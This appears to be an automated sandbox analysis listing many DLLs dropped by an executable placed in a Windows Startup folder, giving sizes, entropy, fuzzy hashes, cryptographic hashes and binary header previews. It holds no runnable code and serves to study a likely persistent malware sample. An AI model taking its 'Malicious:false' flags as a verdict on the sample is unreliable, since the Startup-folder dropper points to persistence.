                                                                                                                                                                                                                                                                                                Size (bytes):13824
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.203867759982304
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
                                                                                                                                                                                                                                                                                                MD5:FE16E1D12CF400448E1BE3FCF2D7BB46
                                                                                                                                                                                                                                                                                                SHA1:81D9F7A2C6540F17E11EFE3920481919965461BA
                                                                                                                                                                                                                                                                                                SHA-256:ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
                                                                                                                                                                                                                                                                                                SHA-512:A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%............P.....................................................`.........................................p8...... 9..d....`.......P..(............p..,...@3...............................2..@............0...............................text...X........................... ..`.rdata..p....0......................@..@.data...p....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):15360
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.478301937972917
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hZ9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZkRsP0rcqgjPrvE:8Q0gH7zSccA5J6ECTGmDua89gjPrvE
                                                                                                                                                                                                                                                                                                MD5:34EBB5D4A90B5A39C5E1D87F61AE96CB
                                                                                                                                                                                                                                                                                                SHA1:25EE80CC1E647209F658AEBA5841F11F86F23C4E
                                                                                                                                                                                                                                                                                                SHA-256:4FC70CB9280E414855DA2C7E0573096404031987C24CF60822854EAA3757C593
                                                                                                                                                                                                                                                                                                SHA-512:82E27044FD53A7309ABAECA06C077A43EB075ADF1EF0898609F3D9F42396E0A1FA4FFD5A64D944705BBC1B1EBB8C2055D8A420807693CC5B70E88AB292DF81B7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%. ..........P.....................................................`..........................................8.......9..d....`.......P..X............p..,....3...............................1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):18432
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.69608744353984
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:nkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+DSngkov:onx7RI26LuuHKz8+DbN
                                                                                                                                                                                                                                                                                                MD5:42C2F4F520BA48779BD9D4B33CD586B9
                                                                                                                                                                                                                                                                                                SHA1:9A1D6FFA30DCA5CE6D70EAC5014739E21A99F6D8
                                                                                                                                                                                                                                                                                                SHA-256:2C6867E88C5D3A83D62692D24F29624063FCE57F600483BAD6A84684FF22F035
                                                                                                                                                                                                                                                                                                SHA-512:1F0C18E1829A5BAE4A40C92BA7F8422D5FE8DBE582F7193ACEC4556B4E0593C898956065F398ACB34014542FCB3365DC6D4DA9CE15CB7C292C8A2F55FB48BB2B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.*... ......P.....................................................`..........................................I.......J..d....p.......`..................,....D..............................PC..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...8....P.......>..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc..,............F..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):19456
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7981108922569735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
                                                                                                                                                                                                                                                                                                MD5:AB0BCB36419EA87D827E770A080364F6
                                                                                                                                                                                                                                                                                                SHA1:6D398F48338FB017AACD00AE188606EB9E99E830
                                                                                                                                                                                                                                                                                                SHA-256:A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
                                                                                                                                                                                                                                                                                                SHA-512:3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.865452719694432
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
                                                                                                                                                                                                                                                                                                MD5:C8FE3FF9C116DB211361FBB3EA092D33
                                                                                                                                                                                                                                                                                                SHA1:180253462DD59C5132FBCCC8428DEA1980720D26
                                                                                                                                                                                                                                                                                                SHA-256:25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
                                                                                                                                                                                                                                                                                                SHA-512:16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.867732744112887
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
                                                                                                                                                                                                                                                                                                MD5:A442EA85E6F9627501D947BE3C48A9DD
                                                                                                                                                                                                                                                                                                SHA1:D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
                                                                                                                                                                                                                                                                                                SHA-256:3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
                                                                                                                                                                                                                                                                                                SHA-512:850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27136
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.860044313282322
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
                                                                                                                                                                                                                                                                                                MD5:59BA0E05BE85F48688316EE4936421EA
                                                                                                                                                                                                                                                                                                SHA1:1198893F5916E42143C0B0F85872338E4BE2DA06
                                                                                                                                                                                                                                                                                                SHA-256:C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
                                                                                                                                                                                                                                                                                                SHA-512:D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27136
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.917025846093607
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
                                                                                                                                                                                                                                                                                                MD5:8194D160FB215498A59F850DC5C9964C
                                                                                                                                                                                                                                                                                                SHA1:D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
                                                                                                                                                                                                                                                                                                SHA-256:55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
                                                                                                                                                                                                                                                                                                SHA-512:969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12800
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.999870226643325
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                                                                                                                                                                                                                                                                MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                                                                                                                                                                                                                                                                SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                                                                                                                                                                                                                                                                SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                                                                                                                                                                                                                                                                SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13312
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.025153056783597
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                                                                                                                                                                                                                                                                MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                                                                                                                                                                                                                                                                SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                                                                                                                                                                                                                                                                SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
                                                                                                                                                                                                                                                                                                SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.235115741550938
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                                                                                                                                                                                MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                                                                                                                                                                                SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                                                                                                                                                                                SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                                                                                                                                                                                SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):15360
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.133714807569085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                                                                                                                                                                                MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                                                                                                                                                                                SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                                                                                                                                                                                SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                                                                                                                                                                                SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35840
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.928082706906375
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                                                                                                                                                                                                                                                                MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                                                                                                                                                                                SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                                                                                                                                                                                SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                                                                                                                                                                                SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.799063285091512
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                                                                                                                                                                                                                                                                MD5:BA46602B59FCF8B01ABB135F1534D618
                                                                                                                                                                                                                                                                                                SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                                                                                                                                                                                                                                                                SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                                                                                                                                                                                                                                                                SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):754688
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.624959985050181
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                                                                                                                                                                                MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                                                                                                                                                                                SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                                                                                                                                                                                SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                                                                                                                                                                                SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):27648
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.792654050660321
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                                                                                                                                                                                MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                                                                                                                                                                                SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                                                                                                                                                                                SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                                                                                                                                                                                SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):67072
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.060461288575063
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                                                                                                                                                                                MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                                                                                                                                                                                SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
                                                                                                                                                                                                                                                                                                SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                                                                                                                                                                                SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                                                                                                                                                                                Malicious:false
